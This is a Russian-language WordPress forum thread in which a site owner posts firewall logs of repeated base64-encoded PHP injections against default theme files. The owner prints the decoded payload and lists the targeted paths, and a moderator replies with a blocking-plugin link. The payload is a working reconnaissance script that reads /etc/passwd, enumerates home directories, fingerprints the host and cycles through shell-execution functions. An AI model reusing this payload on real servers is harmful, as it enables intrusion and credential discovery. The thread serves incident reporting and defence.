27/Aug/15 16:31:12  #5784380  critical     -  37.139.47.83     POST /wp-content/themes/twentytwelve/content.php - base64-encoded injection - [POST:nf0adb6 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:13  #8180956  critical     -  37.139.47.83     POST /wp-content/themes/index.php - base64-encoded injection - [POST:n828e00 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:14  #8539452  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/category.php - base64-encoded injection - [POST:n538c51 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:16  #7744760  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n828043 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:17  #1960222  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n872b97 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:18  #8097579  critical     -  37.139.47.83     POST /wp-content/themes/twentyfifteen/archive.php - base64-encoded injection - [POST:nff638d = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:19  #1696898  critical     -  37.139.47.83     POST /wp-content/themes/twentyfourteen/index.php - base64-encoded injection - [POST:n828e00 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:21  #3787824  critical     -  37.139.47.83     POST /wp-content/themes/twentytwelve/index.php - base64-encoded injection - [POST:n828e00 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:22  #4416995  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n53b3a6 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:23  #4313333  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n55d3bf = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:24  #6754886  critical     -  37.139.47.83     POST /wp-content/themes/twentyfifteen/index.php - base64-encoded injection - [POST:n828e00 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:26  #7223893  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/content-image.php - base64-encoded injection - [POST:nbd7fbf = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:27  #4912150  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:nab6e1b = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:28  #2092694  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n53b3a6 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:29  #5771130  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n79c1ec = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:31  #4779341  critical     -  37.139.47.83     POST /wp-content/themes/twentyfifteen/search.php - base64-encoded injection - [POST:ne0080b = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:32  #1882497  critical     -  37.139.47.83     POST /wp-content/themes/twentyfifteen/author-bio.php - base64-encoded injection - [POST:nb6b4e6 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:33  #4408037  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:nbc8a20 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:34  #8355326  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n635689 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:36  #3419840  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n79c1ec = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:37  #6846525  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/content-status.php - base64-encoded injection - [POST:na3cd7a = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:38  #4943324  critical     -  37.139.47.83     POST /wp-content/themes/twentythirteen/footer.php - base64-encoded injection - [POST:n44390c = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:39  #2630006  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:na04af1 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:41  #2136151  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n9e5e25 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:42  #6541746  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n95dde0 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:43  #5368632  critical     -  37.139.47.83     POST /wp-content/themes/twentyeleven/sidebar-page.php - base64-encoded injection - [POST:n8e416f = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:44  #8481968  critical     -  37.139.47.83     POST /wp-content/themes/twentyfourteen/inc/customizer.php - base64-encoded injection - [POST:na23eb7 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:46  #5453920  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n33beb2 = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 16:31:47  #6897227  critical     -  37.139.47.83     POST /index.php - base64-encoded injection - [POST:n78cd5a = CkBlcnJvcl9yZXBvcnRpbmcoRV9BTEwpOwpAaW5pX3NldCgiZGlzcGxheV9zdGFydHVwX2Vycm9ycyIsMSk7CkBpbmlfc2V0KCJkaXNwbGF5X2Vycm9ycyIsMSk7CkBzZXRfdGltZV9saW1pdCgwKTsKCmRlZmluZSgnU0lEJywgJzEyNzYyMTAnK...]
27/Aug/15 17:05:49  #8816414  medium     531  136.243.5.215    GET /index.php - Suspicious bots/scanners - [HTTP_USER_AGENT = Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)]

    Вот логи моего перехватчика:

    Пихает циферный параметр «nf8ce7b» c BASE64 строкой содержащей:

    @error_reporting(E_ALL);
@ini_set("display_startup_errors",1);
@ini_set("display_errors",1);
@set_time_limit(0);

define('SID', '1276210');
$_ID = 'ID[' . SID . ']';
$GLOBALS['ID'] = $_ID;

trace("MARK: " . sha1('1234567890'));
trace("OS: " . PHP_OS);
trace("PHPVER: " . PHP_VERSION);
trace("DFUN: " . @ini_get('disable_functions'));
trace("<HWID>" . get_uniq_id() . "</HWID>");

$path_ignore = array('home','vhosts');
$wwwdirs = array("www", "public_html", "html", "httpdocs", "web", "domains", "htdocs", "public");
$GLOBALS['wwwdirs'] = $wwwdirs;

if (isset($_SERVER['DOCUMENT_ROOT']) && $_SERVER['DOCUMENT_ROOT'] !== '') {
	$droot = preg_replace("#/$#", "", $_SERVER['DOCUMENT_ROOT']);
	trace("DROOT: " . $droot);

	if (false !== array_search(@basename($droot), $wwwdirs) &&
	    false === array_search(@basename(realpath("$droot/../../")), $path_ignore) &&
		count(@realpath("$droot/../../")) > 1) {
		trace("HOME: " . @realpath("$droot/../../"));
	}
} else {
	trace("DROOT: <undef>" );
} 

trace("USER: " . @get_current_user(). " (" . @getmyuid() . ")");
trace("CWD: " . @getcwd());
if (strlen(@ini_get( 'open_basedir')) > 0 ) {
	$GLOBALS['basedir'] = preg_replace('/[\/\\\]+/', DIRECTORY_SEPARATOR, @ini_get('open_basedir'));
	trace("BASEDIR: " . $GLOBALS['basedir']);
} else {
	trace("BASEDIR: /");
	$GLOBALS['basedir'] = '';
}

if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
	trace("WIN");
	$GLOBALS['os'] = "win";
	trace("WIN_ALL");
	exit;
} else {
   	trace("NIX");
	$GLOBALS['os'] = "nix";
}

trace("TRY GETENT");

if (getpasswd_stream()) {
	trace("+GET PASSWD STREAM");
} else {
	trace("-GET PASSWD STREAM");
	trace("GET PASSWD EXEC");
	$passwd = getpasswd_exec();

	if ($passwd) {
		foreach ($passwd as $user) {
			parse_user($user);
		}
	} else {
		trace("NOTHING FOUND");
	}
}

trace("TRY POSIX");
if (getpasswd_posix())
	trace("+GET PASSWD POSIX");
else
	trace("-GET PASSWD POSIX");

trace("ALL DONE, EXIT");

exit;

//-------------------

function skip_dir($dir) {
	$excludes = array ("/spool", "/nonexist", "/empty", "/var/lib", "/var/cache", "/proc", "/var/run", "/var/mail", "/mysql", "/usr/lib/", "/libexec", "/etc/", "/usr/bin", "/usr/sbin", '/nonexistent', '/dev/', '/var/log/' , '/var/lib/', '/var/cpanel','/tmp', '/clamav', '/cpanel', '/syslog');

	if ($dir === "/")
		return true;

	foreach ($excludes as $exclude)  {
		if (false !== strpos($dir, $exclude))
			return true;
	}

	return false;
}

function check_base($path) {
	$str = ini_get('open_basedir');

	if (false === $str)
		return true;

	if (strlen($str)  > 0) {
		$allowed_dirs = explode(':', $str);

		foreach ($allowed_dirs as $dir) {
			if (false !== strpos($path, $dir))
				return true;
		}

//		trace ("open_basedir: " . $str . " " . $path);
		return false;
	}

	return true;
}

function trace($str) {
	echo $GLOBALS['ID']." ".str_replace("\n", " ", $str)."\n";
}

function parse_user($line) {
	$info = explode(":", $line);

	if (count($info)  >= 6) {
		$name = $info[0];
		$uid = $info[2];
		$group = $info[3];
		$home = preg_replace('/[\/\\\]+/', DIRECTORY_SEPARATOR, $info[5]);

		if ($uid >= 80 && !skip_dir($home)) {
			trace("HOME: $home");
		} else {
//			trace("SKIP: ". join(':', $info));
		}
	} else {
		trace("UNKNOWN USER: '" . $line . "'");
	}

	return true;
}

function getpasswd_exec () {
	$myuid = @getmyuid();

	trace("MYUID: $myuid");

	$cmd = "getent passwd 2>&1 ; echo \"STATUS=\"\$?";

	$out = my_exec($cmd);

	if (false !== $out and (strpos($out, "STATUS=0") !== false)) {
		trace ("getent STATUS=0");

		$passwd = explode ("\n", $out);

		return $passwd;
	} else {
		trace("S_FAIL: $cmd " . str_replace("\n", " ", $out) );
	}

	$passwd = @file("/etc/passwd");

	if (false !== $passwd) {
		trace ("S_OK: READ_PASSWD");

		return $passwd;
	}

	trace("ERROR: CANT_READ_PASSWD");

	$cmd = "cat /etc/passwd 2>&1 ; echo \"STATUS=\"\$?";

	$out = my_exec($cmd);

	if (false !== $out && (strpos($out, "STATUS=0") !== false) ) {
		trace("S_OK: $cmd");	

		$passwd = explode ("\n", $out);

		return $passwd;
	} else {
		trace("S_FAIL: $cmd " . str_replace("\n", " ", $out) );
	}

	return false;
}

function getpasswd_stream() {
	$cmd = "getent passwd 2>&1 ; echo \"STATUS=\"\$?";

	if (!function_exists('popen')) {
		if (!function_exists('proc_open')) {
			return false;
		} else {
			trace("PROC_OPEN");
			$descriptorspec = array(
				0 => array("pipe", "r"),
				1 => array("pipe", "w"),
				2 => array("pipe", "r")
			);
			$f = @proc_open($cmd, $descriptorspec, $pipes, NULL, NULL);
		}
	} else {
		trace("POPEN");
		$f = @popen($cmd,"r");
	}

	if (is_resource($f)) {
		if (isset($pipes)) {
			$fd = $pipes[1];
		} else {
			$fd = $f;
		}

		$count_lines = 0;

		while ($line = @fgets($fd)) {
			$count_lines++;
			parse_user($line);
		}

		if (isset($pipes)) {
			@fclose($fd);
			@proc_close($f);
		} else {
			@pclose($f);
		}

		if ($count_lines == 1) {
			trace('EMPTY');
			return false;
		}

		return true;
	} else {
		return false;
	}
}

function getpasswd_posix() {
	if (!function_exists('posix_getpwuid'))
		return false;

	for($i = 0; $i <= 5000; $i++) {
	    $uid = @posix_getpwuid($i);
	    if ($uid)
			parse_user(join(':',$uid));
	}

	return true;
}

function my_exec($in) {
	$out = '';

	if (isset($GLOBALS['noexec'])) {
		return false;
	}

	if (function_exists('exec')) {
	    @exec($in, $out);
	    $out = @join("\n", $out);
	} elseif (function_exists('passthru')) {
		ob_start();
		@passthru($in);
		$out = ob_get_clean();
	} elseif (function_exists('system')) {
		ob_start();
		@system($in);
		$out = ob_get_clean();
	} elseif (function_exists('shell_exec')) {
		$out = @shell_exec($in);
	} elseif (function_exists('popen') || function_exists('proc_open')) {
		if (!function_exists('popen')) {
			$descriptorspec = array(
					0 => array("pipe", "r"),
					1 => array("pipe", "w"),
					2 => array("pipe", "r")
			);
			$f = @proc_open($in, $descriptorspec, $pipes, NULL, NULL);
		} else {
			$f = @popen($in,"r");
		}

		if (is_resource($f)) {
			if (isset($pipes)) {
				$fd = $pipes[1];
			} else {
				$fd = $f;
			}

			while ($line = @fgets($fd)) {
				$out .= $line;
			}

			if (isset($pipes)) {
				@fclose($fd);
				@proc_close($f);
			} else {
				@pclose($f);
			}
		}
	} else {
		trace("ERROR: EXEC_FUNCTIONS_DISABLED");
		$GLOBALS['noexec'] = 1;
		return false;
	}

	return $out;
}

function get_uniq_id() {
	$ids = array(
	    PHP_OS,
	    @php_uname(),
	    PHP_SAPI,
	    PHP_VERSION,
	    @zend_version(),
	    @$_SERVER["SERVER_SOFTWARE"],
	    substr(@$_SERVER["SERVER_ADDR"],0,strrpos(@$_SERVER["SERVER_ADDR"],'.')),
	    @join("\n", @get_loaded_extensions()),
	    my_exec("ifconfig | grep -E 'HWaddr|ether|inet'"),
	);

	return @sha1(@join("\n", $ids));
}

    Перечень перебираемых скриптов:

    /wp-content/themes/twentythirteen/tag.php
/wp-content/themes/twentythirteen/functions.php
/wp-content/themes/twentytwelve/sidebar.php
/index.php
/wp-content/themes/twentyfourteen/inc/featured-content.php
/wp-content/themes/twentythirteen/author.php
/wp-content/themes/twentyfourteen/content-gallery.php
/wp-content/themes/twentytwelve/content.php
/wp-content/themes/twentyfifteen/archive.php
/wp-content/themes/twentyfifteen/index.php
/wp-content/themes/twentythirteen/content-image.php
/wp-content/themes/twentyfifteen/search.php
/wp-content/themes/twentyfifteen/author-bio.php
/wp-content/themes/twentythirteen/footer.php
/wp-content/themes/twentyeleven/sidebar-page.php

    Возможно в стандартных темах встроено что-то не совсем нужное пользователям…

    Модератор Yui

    (@fierevere)

    永子

    8 лет, 7 месяцев назад

    https://wordpress.org/plugins/block-bad-queries/

Просмотр 12 ответов — с 1 по 12 (всего 12)
  • Тема «Перманентный взлом» закрыта для новых ответов.

Метки темы

Просмотр